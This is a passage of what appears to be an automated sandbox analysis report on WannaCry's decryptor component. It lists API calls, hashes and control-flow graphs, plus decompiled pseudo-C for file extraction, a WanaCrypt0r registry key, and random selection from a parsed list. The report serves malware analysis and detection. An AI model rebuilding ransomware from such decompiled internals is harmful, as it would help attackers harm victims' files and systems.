                                  • #2302.MFC42(?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?), ref: 0040641E
                                  • #2302.MFC42(?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?), ref: 00406430
                                  • #2302.MFC42(?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?), ref: 00406442
                                  • #2302.MFC42(?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?), ref: 00406454
                                  • #2302.MFC42(?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?), ref: 00406466
                                  • #2302.MFC42(?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?), ref: 00406478
                                  • #2370.MFC42(?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?), ref: 0040648A
                                  • #2370.MFC42(?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?), ref: 0040649C
                                  • #2370.MFC42(?,000003EF,?,?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?), ref: 004064AE
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2302$#2370
                                  • String ID:
                                  • API String ID: 1711274145-0
                                  • Opcode ID: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                  • Instruction ID: 0d28d22553b71fc94a0ee6c66579bb390b9294cd647fac9b7e1ecc0347327b15
                                  • Opcode Fuzzy Hash: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                  • Instruction Fuzzy Hash: 32218E711806017FE22AE365CD82FFFA26CEF85B04F00452EB369951C1BBE8365B5665
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  C-Code - Quality: 95%
                                  			E00412360(signed int __ecx, signed int _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                  				void* _v0;
                                  				char _v260;
                                  				struct _FILETIME _v268;
                                  				struct _FILETIME _v276;
                                  				struct _FILETIME _v284;
                                  				void* _v292;
                                  				void* _v296;
                                  				signed int _v304;
                                  				char _v560;
                                  				struct _OVERLAPPED* _v820;
                                  				void* _v824;
                                  				void* _v827;
                                  				void* _v828;
                                  				long _v829;
                                  				void* _v836;
                                  				intOrPtr _t68;
                                  				long _t77;
                                  				void* _t81;
                                  				void* _t82;
                                  				void* _t90;
                                  				void* _t91;
                                  				long _t94;
                                  				signed int _t97;
                                  				long _t99;
                                  				void* _t104;
                                  				void* _t106;
                                  				int _t116;
                                  				long _t121;
                                  				signed int _t132;
                                  				signed int _t138;
                                  				unsigned int _t140;
                                  				signed int _t141;
                                  				void* _t154;
                                  				intOrPtr* _t157;
                                  				intOrPtr _t166;
                                  				void* _t174;
                                  				signed int _t175;
                                  				signed int _t176;
                                  				long _t177;
                                  				signed int _t178;
                                  				signed int _t179;
                                  				intOrPtr* _t180;
                                  				void* _t182;
                                  				long _t183;
                                  				intOrPtr* _t185;
                                  				void* _t187;
                                  				void* _t191;
                                  				void* _t192;
                                  
                                  				_t166 = _a16;
                                  				_t132 = __ecx;
                                  				if(_t166 == 3) {
                                  					_t68 =  *((intOrPtr*)(__ecx + 4));
                                  					_t176 = _a4;
                                  					__eflags = _t176 - _t68;
                                  					if(_t176 == _t68) {
                                  						L14:
                                  						_t177 = E00411810( *_t132, _a8, _a12,  &_v829);
                                  						__eflags = _t177;
                                  						if(_t177 <= 0) {
                                  							E00411AC0( *_t132);
                                  							 *(_t132 + 4) = 0xffffffff;
                                  						}
                                  						__eflags = _v829;
                                  						if(_v829 == 0) {
                                  							__eflags = _t177;
                                  							if(_t177 <= 0) {
                                  								asm("sbb eax, eax");
                                  								_t77 = 0x1000 + ( ~(_t177 - 0xffffff96) & 0x04fff000);
                                  								__eflags = _t77;
                                  								return _t77;
                                  							} else {
                                  								return 0x600;
                                  							}
                                  						} else {
                                  							__eflags = 0;
                                  							return 0;
                                  						}
                                  					} else {
                                  						__eflags = _t68 - 0xffffffff;
                                  						if(_t68 != 0xffffffff) {
                                  							E00411AC0( *((intOrPtr*)(__ecx)));
                                  							_t187 = _t187 + 4;
                                  						}
                                  						_t81 =  *_t132;
                                  						 *(_t132 + 4) = 0xffffffff;
                                  						__eflags = _t176 -  *((intOrPtr*)(_t81 + 4));
                                  						if(_t176 <  *((intOrPtr*)(_t81 + 4))) {
                                  							__eflags = _t176 -  *((intOrPtr*)(_t81 + 0x10));
                                  							if(_t176 <  *((intOrPtr*)(_t81 + 0x10))) {
                                  								E00411390(_t81);
                                  								_t187 = _t187 + 4;
                                  							}
                                  							_t82 =  *_t132;
                                  							__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
                                  							while( *((intOrPtr*)(_t82 + 0x10)) < _t176) {
                                  								E004113E0(_t82);
                                  								_t82 =  *_t132;
                                  								_t187 = _t187 + 4;
                                  								__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
                                  							}
                                  							_push( *((intOrPtr*)(_t132 + 0x138)));
                                  							_push( *_t132);
                                  							E00411660();
                                  							_t187 = _t187 + 8;
                                  							 *(_t132 + 4) = _t176;
                                  							goto L14;
                                  						} else {
                                  							return 0x10000;
                                  						}
                                  					}
                                  				} else {
                                  					if(_t166 == 2 || _t166 == 1) {
                                  						_t178 = _t175 | 0xffffffff;
                                  						__eflags =  *(_t132 + 4) - _t178;
                                  						if( *(_t132 + 4) != _t178) {
                                  							E00411AC0( *_t132);
                                  							_t187 = _t187 + 4;
                                  						}
                                  						_t90 =  *_t132;
                                  						 *(_t132 + 4) = _t178;
                                  						_t179 = _a4;
                                  						__eflags = _t179 -  *((intOrPtr*)(_t90 + 4));
                                  						if(_t179 <  *((intOrPtr*)(_t90 + 4))) {
                                  							__eflags = _t179 -  *((intOrPtr*)(_t90 + 0x10));
                                  							if(_t179 <  *((intOrPtr*)(_t90 + 0x10))) {
                                  								E00411390(_t90);
                                  								_t187 = _t187 + 4;
                                  							}
                                  							_t91 =  *_t132;
                                  							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
                                  							while( *((intOrPtr*)(_t91 + 0x10)) < _t179) {
                                  								E004113E0(_t91);
                                  								_t91 =  *_t132;
                                  								_t187 = _t187 + 4;
                                  								__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
                                  							}
                                  							_t138 = _t132;
                                  							E00411CF0(_t138, _t179,  &_v560);
                                  							__eflags = _v304 & 0x00000010;
                                  							if((_v304 & 0x00000010) == 0) {
                                  								__eflags = _t166 - 1;
                                  								if(_t166 != 1) {
                                  									_t157 = _a8;
                                  									_t185 = _t157;
                                  									_t180 = _t157;
                                  									_t94 =  *_t157;
                                  									__eflags = _t94;
                                  									while(_t94 != 0) {
                                  										__eflags = _t94 - 0x2f;
                                  										if(_t94 == 0x2f) {
                                  											L43:
                                  											_t185 = _t180 + 1;
                                  										} else {
                                  											__eflags = _t94 - 0x5c;
                                  											if(_t94 == 0x5c) {
                                  												goto L43;
                                  											}
                                  										}
                                  										_t94 =  *((intOrPtr*)(_t180 + 1));
                                  										_t180 = _t180 + 1;
                                  										__eflags = _t94;
                                  									}
                                  									asm("repne scasb");
                                  									_t140 =  !(_t138 | 0xffffffff);
                                  									_v828 =  &_v820;
                                  									_t182 = _t157 - _t140;
                                  									_t141 = _t140 >> 2;
                                  									_t97 = memcpy(_v828, _t182, _t141 << 2);
                                  									__eflags = _t185 - _t157;
                                  									memcpy(_t182 + _t141 + _t141, _t182, _t97 & 0x00000003);
                                  									_t191 = _t187 + 0x18;
                                  									if(__eflags != 0) {
                                  										 *((char*)(_t191 + _t185 - _t157 + 0x1c)) = 0;
                                  										_t99 = _v820;
                                  										__eflags = _t99 - 0x2f;
                                  										if(_t99 == 0x2f) {
                                  											L55:
                                  											wsprintfA( &_v260, "%s%s",  &_v820, _t185);
                                  											E00412250(0, _t191 + 0x2c);
                                  											_t187 = _t191 + 0x18;
                                  											goto L48;
                                  										} else {
                                  											__eflags = _t99 - 0x5c;
                                  											if(_t99 == 0x5c) {
                                  												goto L55;
                                  											} else {
                                  												__eflags = _t99;
                                  												if(_t99 == 0) {
                                  													goto L47;
                                  												} else {
                                  													__eflags =  *((char*)(_t191 + 0x1d)) - 0x3a;
                                  													if( *((char*)(_t191 + 0x1d)) != 0x3a) {
                                  														goto L47;
                                  													} else {
                                  														goto L55;
                                  													}
                                  												}
                                  											}
                                  										}
                                  										goto L73;
                                  									} else {
                                  										_v820 = 0;
                                  										L47:
                                  										wsprintfA( &_v260, "%s%s%s", _t132 + 0x140,  &_v820, _t185);
                                  										E00412250(_t132 + 0x140, _t191 + 0x30);
                                  										_t187 = _t191 + 0x1c;
                                  									}
                                  									L48:
                                  									_t104 = CreateFileA(_t187 + 0x260, 0x40000000, 0, 0, 2,  *(_t187 + 0x228), 0); // executed
                                  									_t174 = _t104;
                                  								} else {
                                  									_t174 = _a8;
                                  								}
                                  								__eflags = _t174 - 0xffffffff;
                                  								if(_t174 != 0xffffffff) {
                                  									_push( *((intOrPtr*)(_t132 + 0x138)));
                                  									_push( *_t132); // executed
                                  									E00411660(); // executed
                                  									_t106 =  *(_t132 + 0x13c);
                                  									_t192 = _t187 + 8;
                                  									__eflags = _t106;
                                  									if(_t106 == 0) {
                                  										_push(0x4000); // executed
                                  										L00412CEC(); // executed
                                  										_t192 = _t192 + 4;
                                  										 *(_t132 + 0x13c) = _t106;
                                  									}
                                  									_v820 = 0;
                                  									while(1) {
                                  										_t183 = E00411810( *_t132,  *(_t132 + 0x13c), 0x4000, _t192 + 0x13);
                                  										_t192 = _t192 + 0x10;
                                  										__eflags = _t183 - 0xffffff96;
                                  										if(_t183 == 0xffffff96) {
                                  											break;
                                  										}
                                  										__eflags = _t183;
                                  										if(__eflags < 0) {
                                  											L68:
                                  											_v820 = 0x5000000;
                                  										} else {
                                  											if(__eflags <= 0) {
                                  												L63:
                                  												__eflags =  *(_t192 + 0x13);
                                  												if( *(_t192 + 0x13) != 0) {
                                  													SetFileTime(_t174,  &_v276,  &_v284,  &_v268); // executed
                                  												} else {
                                  													__eflags = _t183;
                                  													if(_t183 == 0) {
                                  														goto L68;
                                  													} else {
                                  														continue;
                                  													}
                                  												}
                                  											} else {
                                  												_t116 = WriteFile(_t174,  *(_t132 + 0x13c), _t183, _t192 + 0x18, 0); // executed
                                  												__eflags = _t116;
                                  												if(_t116 == 0) {
                                  													_v820 = 0x400;
                                  												} else {
                                  													goto L63;
                                  												}
                                  											}
                                  										}
                                  										L70:
                                  										__eflags =  *((intOrPtr*)(_t192 + 0x360)) - 1;
                                  										if( *((intOrPtr*)(_t192 + 0x360)) != 1) {
                                  											FindCloseChangeNotification(_t174); // executed
                                  										}
                                  										E00411AC0( *_t132);
                                  										return _v820;
                                  										goto L73;
                                  									}
                                  									_v820 = 0x1000;
                                  									goto L70;
                                  								} else {
                                  									return 0x200;
                                  								}
                                  							} else {
                                  								__eflags = _t166 - 1;
                                  								if(_t166 != 1) {
                                  									_t154 = _a8;
                                  									_t121 =  *_t154;
                                  									__eflags = _t121 - 0x2f;
                                  									if(_t121 == 0x2f) {
                                  										L36:
                                  										E00412250(0, _t154);
                                  										__eflags = 0;
                                  										return 0;
                                  									} else {
                                  										__eflags = _t121 - 0x5c;
                                  										if(_t121 == 0x5c) {
                                  											goto L36;
                                  										} else {
                                  											__eflags = _t121;
                                  											if(_t121 == 0) {
                                  												L37:
                                  												E00412250(_t132 + 0x140, _t154);
                                  												__eflags = 0;
                                  												return 0;
                                  											} else {
                                  												__eflags =  *((char*)(_t154 + 1)) - 0x3a;
                                  												if( *((char*)(_t154 + 1)) != 0x3a) {
                                  													goto L37;
                                  												} else {
                                  													goto L36;
                                  												}
                                  											}
                                  										}
                                  									}
                                  								} else {
                                  									__eflags = 0;
                                  									return 0;
                                  								}
                                  							}
                                  						} else {
                                  							return 0x10000;
                                  						}
                                  					} else {
                                  						return 0x10000;
                                  					}
                                  				}
                                  				L73:
                                  			}

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: %s%s$%s%s%s$:
                                  • API String ID: 0-3034790606
                                  • Opcode ID: 8e6b1c0f2cb56c42e6e36ab9d60359e8445b3ce9f897c3f3fd7fecc5fb48561e
                                  • Instruction ID: ec0a86814d75b7591ef383b01d603f7b60d36dbaf36e5cde56c141efaaef7cbf
                                  • Opcode Fuzzy Hash: 8e6b1c0f2cb56c42e6e36ab9d60359e8445b3ce9f897c3f3fd7fecc5fb48561e
                                  • Instruction Fuzzy Hash: 67C138726002045BDB20DF18ED81BEB7398EB85314F04456BFD54CB385D2BDE99A87AA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 426 401c70-401cd8 wcscat 427 401cdc-401cde 426->427 428 401ce0-401cef 427->428 429 401cf1-401cfb 427->429 430 401d00-401d0c RegCreateKeyW 428->430 429->430 431 401d12-401d1b 430->431 432 401dad-401db5 430->432 433 401d62-401d8e RegQueryValueExA 431->433 434 401d1d-401d60 GetCurrentDirectoryA RegSetValueExA 431->434 432->427 435 401dbb-401dc7 432->435 436 401d9e-401dab RegCloseKey 433->436 437 401d90-401d98 SetCurrentDirectoryA 433->437 434->436 436->432 438 401dc8-401dd7 436->438 437->436
                                  C-Code - Quality: 84%
                                  			E00401C70(signed int _a4) {
                                  				void _v519;
                                  				char _v520;
                                  				void _v700;
                                  				short _v720;
                                  				int _v724;
                                  				void* _v728;
                                  				int _t30;
                                  				void* _t36;
                                  				signed int _t38;
                                  				signed int _t46;
                                  				signed int _t56;
                                  				int _t72;
                                  				void* _t77;
                                  
                                  				_t30 = memset( &_v700, memcpy( &_v720, L"Software\\", 5 << 2), 0x2d << 2);
                                  				_v520 = _t30;
                                  				memset( &_v519, _t30, 0x81 << 2);
                                  				asm("stosw");
                                  				asm("stosb");
                                  				_v728 = 0;
                                  				wcscat( &_v720, L"WanaCrypt0r");
                                  				_t72 = 0;
                                  				_v724 = 0;
                                  				do {
                                  					if(_t72 != 0) {
                                  						RegCreateKeyW(0x80000001,  &_v720,  &_v728);
                                  					} else {
                                  						RegCreateKeyW(0x80000002,  &_v720,  &_v728);
                                  					}
                                  					_t36 = _v728;
                                  					if(_t36 == 0) {
                                  						goto L10;
                                  					} else {
                                  						_t56 = _a4;
                                  						if(_t56 == 0) {
                                  							_v724 = 0x207;
                                  							_t38 = RegQueryValueExA(_t36, "wd", 0, 0,  &_v520,  &_v724); // executed
                                  							asm("sbb esi, esi");
                                  							_t77 =  ~_t38 + 1;
                                  							if(_t77 != 0) {
                                  								SetCurrentDirectoryA( &_v520);
                                  							}
                                  						} else {
                                  							GetCurrentDirectoryA(0x207,  &_v520);
                                  							asm("repne scasb");
                                  							_t46 = RegSetValueExA(_v728, "wd", 0, 1,  &_v520,  !(_t56 | 0xffffffff));
                                  							_t72 = _v724;
                                  							asm("sbb esi, esi");
                                  							_t77 =  ~_t46 + 1;
                                  						}
                                  						RegCloseKey(_v728); // executed
                                  						if(_t77 != 0) {
                                  							return 1;
                                  						} else {
                                  							goto L10;
                                  						}
                                  					}
                                  					L13:
                                  					L10:
                                  					_t72 = _t72 + 1;
                                  					_v724 = _t72;
                                  				} while (_t72 < 2);
                                  				return 0;
                                  				goto L13;
                                  			}


                                  APIs
                                  • wcscat.MSVCRT ref: 00401CC1
                                  • RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                  • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
                                  • RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                  • RegQueryValueExA.KERNELBASE ref: 00401D81
                                  • SetCurrentDirectoryA.KERNEL32(?), ref: 00401D98
                                  • RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentDirectoryValue$CloseCreateQuerywcscat
                                  • String ID: Software\$WanaCrypt0r
                                  • API String ID: 3883271862-1723423467
                                  • Opcode ID: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                  • Instruction ID: c02b3dbe7123360802e3a7ceba079e11f57c538643229ddb10ed726050e42e59
                                  • Opcode Fuzzy Hash: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                  • Instruction Fuzzy Hash: 5F31C271208341ABD320CF54DC44BEBB7A8FFC4750F404D2EF996A7290D7B4A90987A6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 439 40baf0-40bb16 call 40ba10 442 40bdf5 439->442 443 40bb1c-40bb36 439->443 444 40bdf8-40be10 442->444 446 40bb38-40bb47 call 40ba60 443->446 447 40bb4d-40bbb5 call 40c8f0 strtok 443->447 446->444 446->447 452 40bc30-40bc3f 447->452 453 40bbb7 447->453 454 40bc41-40bc48 452->454 455 40bc7e-40bc90 call 40ba60 452->455 456 40bbbb-40bbc0 453->456 457 40bc4d-40bc55 454->457 465 40bc92-40bce7 call 40c860 #825 455->465 466 40bcec-40bd01 GetTickCount srand 455->466 458 40bbc2-40bc16 call 40c7b0 call 40c920 call 40c800 call 40c7b0 456->458 459 40bc1b-40bc2e strtok 456->459 461 40bc75-40bc77 457->461 462 40bc57-40bc59 457->462 458->459 459->452 459->456 469 40bc7a-40bc7c 461->469 467 40bc71-40bc73 462->467 468 40bc5b-40bc65 462->468 465->444 472 40bdc7-40bdf2 call 40c860 #825 466->472 473 40bd07-40bd1c rand 466->473 467->469 468->461 474 40bc67-40bc6f 468->474 469->455 469->466 472->442 478 40bd26-40bd28 473->478 479 40bd1e 473->479 474->457 474->467 484 40bd32-40bd3a 478->484 485 40bd2a 478->485 483 40bd20-40bd24 479->483 483->478 483->483 488 40bd41-40bd73 call 40ba60 484->488 489 40bd3c 484->489 487 40bd2c-40bd30 485->487 487->484 487->487 493 40be11-40be4c 488->493 494 40bd79-40bdc1 call 40ce50 #825 Sleep 488->494 489->488 495 40be75-40be84 #825 493->495 496 40be4e-40be73 call 402d90 call 40c740 493->496 494->472 494->473 495->444 496->495
                                  C-Code - Quality: 86%
                                  			E0040BAF0() {
                                  				signed int _t71;
                                  				signed int _t72;
                                  				void* _t84;
                                  				signed int _t86;
                                  				signed int _t91;
                                  				signed int _t92;
                                  				signed int _t97;
                                  				intOrPtr _t101;
                                  				signed int _t110;
                                  				void* _t113;
                                  				void* _t116;
                                  				signed int _t126;
                                  				char _t129;
                                  				signed int _t131;
                                  				unsigned int _t138;
                                  				signed int _t139;
                                  				char* _t144;
                                  				signed int _t147;
                                  				unsigned int _t152;
                                  				signed int _t153;
                                  				signed int _t158;
                                  				signed int _t160;
                                  				signed int _t161;
                                  				signed int _t169;
                                  				signed int _t172;
                                  				signed int _t173;
                                  				signed int _t181;
                                  				signed int _t191;
                                  				signed int _t198;
                                  				signed int _t199;
                                  				signed int _t200;
                                  				void* _t237;
                                  				char* _t238;
                                  				void* _t240;
                                  				void* _t241;
                                  				intOrPtr* _t242;
                                  				void* _t245;
                                  				intOrPtr* _t246;
                                  				signed int _t249;
                                  				intOrPtr* _t250;
                                  				intOrPtr _t251;
                                  				void* _t252;
                                  				void* _t255;
                                  				void* _t256;
                                  				void* _t257;
                                  				void* _t259;
                                  				void* _t260;
                                  				void* _t262;
                                  				void* _t263;
                                  				void* _t264;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00414286);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t251;
                                  				_t252 = _t251 - 0x47c;
                                  				_t71 = E0040BA10();
                                  				if(_t71 != 0) {
                                  					L31:
                                  					_t72 = _t71 | 0xffffffff;
                                  					__eflags = _t72;
                                  				} else {
                                  					_t131 =  *0x422210; // 0xb24228
                                  					 *((intOrPtr*)( *_t131 + 0xc))();
                                  					asm("repne scasb");
                                  					_t266 =  !(_t131 | 0xffffffff) == 1;
                                  					if( !(_t131 | 0xffffffff) == 1) {
                                  						L3:
                                  						_t249 = 0;
                                  						 *((char*)(_t252 + 0x14)) =  *((intOrPtr*)(_t252 + 0x13));
                                  						 *((intOrPtr*)(_t252 + 0x18)) = E0040C8F0(0, 0, 0);
                                  						 *(_t252 + 0x1c) = 0;
                                  						asm("repne scasb");
                                  						_t138 =  !(_t252 + 0x0000001c | 0xffffffff);
                                  						_t237 =  *((intOrPtr*)(_t252 + 0x49c)) - _t138;
                                  						 *((intOrPtr*)(_t252 + 0x498)) = 0;
                                  						_t139 = _t138 >> 2;
                                  						memcpy(_t237 + _t139 + _t139, _t237, memcpy(_t252 + 0xa4, _t237, _t139 << 2) & 0x00000003);
                                  						_t255 = _t252 + 0x18;
                                  						_t144 = _t255 + 0xa8;
                                  						_t238 = strtok(_t144, ",;");
                                  						_t256 = _t255 + 8;
                                  						if(_t238 != 0) {
                                  							_t129 =  *((intOrPtr*)(_t256 + 0x13));
                                  							do {
                                  								_t200 = _t249;
                                  								_t249 = _t249 + 1;
                                  								if(_t200 > 0) {
                                  									_t181 = _t256 + 0x28;
                                  									 *(_t256 + 0x28) = _t129;
                                  									E0040C7B0(_t181, 0);
                                  									asm("repne scasb");
                                  									_push( !(_t181 | 0xffffffff) - 1);
                                  									_push(_t238);
                                  									E0040C920(_t256 + 0x2c);
                                  									 *((char*)(_t256 + 0x4a0)) = 1;
                                  									E0040C800(_t256 + 0x24, _t256 + 0x20, _t256 + 0x24,  *((intOrPtr*)(_t256 + 0x18)), _t256 + 0x24);
                                  									_t144 = _t256 + 0x28;
                                  									 *((char*)(_t256 + 0x498)) = 0;
                                  									E0040C7B0(_t144, 1);
                                  								}
                                  								_t238 = strtok(0, ",;");
                                  								_t256 = _t256 + 8;
                                  							} while (_t238 != 0);
                                  						}
                                  						asm("repne scasb");
                                  						_t147 =  !(_t144 | 0xffffffff) - 1;
                                  						if(_t147 == 0) {
                                  							L17:
                                  							_push(_t256 + 0xa4);
                                  							_t84 = E0040BA60(_t277);
                                  							_t256 = _t256 + 4;
                                  							if(_t84 != 0) {
                                  								goto L19;
                                  							} else {
                                  								asm("repne scasb");
                                  								_t172 =  !(_t147 | 0xffffffff);
                                  								_t245 = _t256 + 0xa4 - _t172;
                                  								_t173 = _t172 >> 2;
                                  								memcpy(0x422214, _t245, _t173 << 2);
                                  								_t263 = _t256 + 0xc;
                                  								 *((intOrPtr*)(_t263 + 0x498)) = 0xffffffff;
                                  								_t113 = memcpy(_t245 + _t173 + _t173, _t245, _t172 & 0x00000003);
                                  								_t264 = _t263 + 0xc;
                                  								E0040C860(_t264 + 0x20, _t264 + 0x24,  *_t113,  *((intOrPtr*)(_t256 + 0x18)));
                                  								_push( *((intOrPtr*)(_t264 + 0x18)));
                                  								L00412C98();
                                  								_t252 = _t264 + 4;
                                  								_t72 = 0;
                                  							}
                                  						} else {
                                  							_t246 = _t256 + 0xa4;
                                  							_t116 = 0x422214;
                                  							while(1) {
                                  								_t198 =  *_t116;
                                  								_t147 = _t198;
                                  								if(_t198 !=  *_t246) {
                                  									break;
                                  								}
                                  								if(_t147 == 0) {
                                  									L14:
                                  									_t116 = 0;
                                  								} else {
                                  									_t24 = _t116 + 1; // 0x0
                                  									_t199 =  *_t24;
                                  									_t147 = _t199;
                                  									if(_t199 !=  *((intOrPtr*)(_t246 + 1))) {
                                  										break;
                                  									} else {
                                  										_t116 = _t116 + 2;
                                  										_t246 = _t246 + 2;
                                  										if(_t147 != 0) {
                                  											continue;
                                  										} else {
                                  											goto L14;
                                  										}
                                  									}
                                  								}
                                  								L16:
                                  								_t277 = _t116;
                                  								if(_t116 == 0) {
                                  									L19:
                                  									srand(GetTickCount());
                                  									_t86 =  *(_t256 + 0x20);
                                  									_t257 = _t256 + 4;
                                  									__eflags = _t86;
                                  									if(_t86 <= 0) {
                                  										L30:
                                  										 *((intOrPtr*)(_t257 + 0x494)) = 0xffffffff;
                                  										_t71 = E0040C860(_t257 + 0x20, _t257 + 0x3c,  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18)))),  *((intOrPtr*)(_t257 + 0x18)));
                                  										_push( *((intOrPtr*)(_t257 + 0x18)));
                                  										L00412C98();
                                  										_t252 = _t257 + 4;
                                  										goto L31;
                                  									} else {
                                  										do {
                                  											_t191 = rand() % _t86;
                                  											_t250 =  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18))));
                                  											__eflags = _t191;
                                  											_t91 = _t191;
                                  											if(_t191 > 0) {
                                  												_t91 = 0;
                                  												__eflags = 0;
                                  												do {
                                  													_t250 =  *_t250;
                                  													_t191 = _t191 - 1;
                                  													__eflags = _t191;
                                  												} while (_t191 != 0);
                                  											}
                                  											__eflags = _t91;
                                  											if(_t91 < 0) {
                                  												_t110 =  ~_t91;
                                  												do {
                                  													_t250 =  *((intOrPtr*)(_t250 + 4));
                                  													_t110 = _t110 - 1;
                                  													__eflags = _t110;
                                  												} while (_t110 != 0);
                                  											}
                                  											_t92 =  *(_t250 + 0xc);
                                  											_t42 = _t250 + 8; // 0x8
                                  											_t126 = _t42;
                                  											__eflags = _t92;
                                  											if(__eflags == 0) {
                                  												_t92 = 0x41ba38;
                                  											}
                                  											asm("repne scasb");
                                  											_t152 =  !(_t147 | 0xffffffff);
                                  											_t240 = _t92 - _t152;
                                  											_t153 = _t152 >> 2;
                                  											memcpy(_t240 + _t153 + _t153, _t240, memcpy(_t257 + 0x40, _t240, _t153 << 2) & 0x00000003);
                                  											_t259 = _t257 + 0x18;
                                  											_t158 = _t259 + 0x40;
                                  											_push(_t158);
                                  											_t97 = E0040BA60(__eflags);
                                  											_t260 = _t259 + 4;
                                  											__eflags = _t97;
                                  											if(_t97 == 0) {
                                  												 *((intOrPtr*)(_t260 + 0x494)) = 0xffffffff;
                                  												asm("repne scasb");
                                  												_t160 =  !(_t158 | 0xffffffff);
                                  												_t241 = _t260 + 0x40 - _t160;
                                  												_t161 = _t160 >> 2;
                                  												memcpy(0x422214, _t241, _t161 << 2);
                                  												memcpy(_t241 + _t161 + _t161, _t241, _t160 & 0x00000003);
                                  												_t262 = _t260 + 0x18;
                                  												_t242 =  *((intOrPtr*)(_t262 + 0x18));
                                  												_t101 =  *_t242;
                                  												__eflags = _t101 - _t242;
                                  												 *((intOrPtr*)(_t262 + 0x20)) = _t101;
                                  												if(_t101 != _t242) {
                                  													do {
                                  														_push(0);
                                  														E0040C740(_t262 + 0x1c, _t262 + 0x3c,  *((intOrPtr*)(E00402D90(_t262 + 0x28, _t262 + 0x38))));
                                  														__eflags =  *((intOrPtr*)(_t262 + 0x20)) - _t242;
                                  													} while ( *((intOrPtr*)(_t262 + 0x20)) != _t242);
                                  												}
                                  												_push( *((intOrPtr*)(_t262 + 0x18)));
                                  												L00412C98();
                                  												_t252 = _t262 + 4;
                                  												_t72 = 0;
                                  											} else {
                                  												goto L29;
                                  											}
                                  											goto L32;
                                  											L29:
                                  											_t169 =  *0x422210; // 0xb24228
                                  											 *((intOrPtr*)( *_t169 + 0xc))();
                                  											 *((intOrPtr*)( *((intOrPtr*)(_t250 + 4)))) =  *_t250;
                                  											_t147 = _t126;
                                  											 *((intOrPtr*)( *_t250 + 4)) =  *((intOrPtr*)(_t250 + 4));
